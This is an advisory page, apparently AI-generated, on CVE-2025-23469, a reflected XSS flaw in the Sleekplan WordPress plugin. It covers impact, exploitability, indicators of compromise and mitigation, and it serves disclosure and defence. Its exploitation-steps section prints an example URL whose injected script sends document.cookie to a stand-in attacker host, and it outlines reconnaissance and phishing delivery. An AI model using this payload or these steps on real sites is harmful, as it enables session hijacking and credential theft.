CVE-2025-23469
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-23469 is a Reflected Cross-Site Scripting (XSS) vulnerability in the Sleekplan WordPress plugin affecting all versions up to and including 0.2.0. The vulnerability was reported by researcher Mika on October 16, 2024, and publicly disclosed by Patchstack on December 29–30, 2025. As of the time of reporting, no official patch has been released by the plugin developer. It carries a CVSS v3.1 base score of 7.1 (High), assigned by Patchstack (Patchstack, Red Hat CVE).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically a Reflected XSS flaw. Unsanitized user-supplied input is reflected back in the web page response without proper encoding or escaping, allowing an attacker to inject arbitrary JavaScript into the page context. Exploitation requires no authentication (unauthenticated attacker) but does require user interaction — a victim must click a crafted malicious link or visit a specially crafted URL. The vulnerability falls under OWASP Top 10 category A3: Injection (Patchstack).

Impact

Successful exploitation allows an attacker to inject and execute malicious scripts in the browser of a victim who clicks a crafted link, potentially leading to session hijacking, credential theft, unauthorized actions performed on behalf of the victim, or redirection to malicious sites. Because the scope is changed (S:C in the CVSS vector), the injected script can affect resources beyond the vulnerable plugin's own context. Patchstack notes that vulnerabilities of this type are commonly used in mass-exploit campaigns targeting thousands of WordPress sites regardless of their size or traffic (Patchstack).

Exploitability

No official patch is currently available for the Sleekplan plugin, leaving all installations at version 0.2.0 or below exposed. The EPSS score is approximately 0.033% (0.000330), indicating a low but non-zero probability of exploitation in the near term. No evidence of active in-the-wild exploitation or threat actor attribution has been publicly reported, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Patchstack has issued a virtual patching/mitigation rule for its subscribers to block exploitation attempts until an official fix is available (Patchstack).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the Sleekplan plugin (version ≤ 0.2.0) using tools like WPScan, Shodan, or by inspecting publicly accessible WordPress plugin directories.
  2. Identify vulnerable parameter: Locate the plugin's endpoint or page that reflects unsanitized user input back in the HTTP response without proper output encoding.
  3. Craft malicious URL: Construct a URL containing a reflected XSS payload in the vulnerable parameter, for example: https://target-site.com/?sleekplan_param=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.
  4. Deliver the payload: Send the crafted URL to a target victim (e.g., a site administrator) via phishing email, social engineering, or by embedding it in a forum post or comment.
  5. Achieve objective: When the victim clicks the link and their browser loads the page, the injected script executes in their browser session, enabling cookie theft, session hijacking, or other malicious actions (Patchstack).

Indicators of compromise

  • Network: HTTP requests to WordPress pages hosting the Sleekplan plugin containing URL-encoded script tags or JavaScript event handlers (e.g., %3Cscript%3E, onerror=, onload=) in query parameters; outbound requests from victim browsers to unknown external domains shortly after visiting a Sleekplan-related page.
  • Logs: Web server access logs showing GET requests to Sleekplan plugin endpoints with suspicious query strings containing HTML/JavaScript injection patterns; referrer headers pointing to external or unknown sources.
  • Browser/Client: Unexpected redirects or pop-ups on pages using the Sleekplan plugin; browser developer console errors related to cross-origin script execution.

Mitigation and workarounds

As of the disclosure date, no official patch has been released by the Sleekplan plugin developer, and the vulnerable version (≤ 0.2.0) remains unpatched. Site administrators are advised to deactivate and remove the Sleekplan plugin until an official fix is available. Patchstack users benefit from an automatically applied virtual patch/mitigation rule that blocks exploitation attempts. Additionally, deploying a Web Application Firewall (WAF) with XSS filtering rules can provide interim protection (Patchstack).

Community reactions

The vulnerability was reported to Patchstack by researcher Mika and published through Patchstack's vulnerability disclosure program. No significant vendor statements, notable researcher commentary beyond the initial disclosure, or major media coverage have been identified for this CVE. The vulnerability was noted in automated CVE tracking feeds and aggregators but has not generated substantial community discussion (Patchstack).

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2024-13784CRITICAL9.8
  • arforms-form-builder
NoYesAug 16, 2026
CVE-2026-17087HIGH7.5
  • wp-travel-engine
NoYesAug 16, 2026
CVE-2026-2497HIGH7.2
  • gallery-plugin
NoYesAug 16, 2026
CVE-2026-17608MEDIUM6.5
  • wp-compress-image-optimizer
NoYesAug 16, 2026
CVE-2026-2357MEDIUM6.4
  • bold-page-builder
NoYesAug 16, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management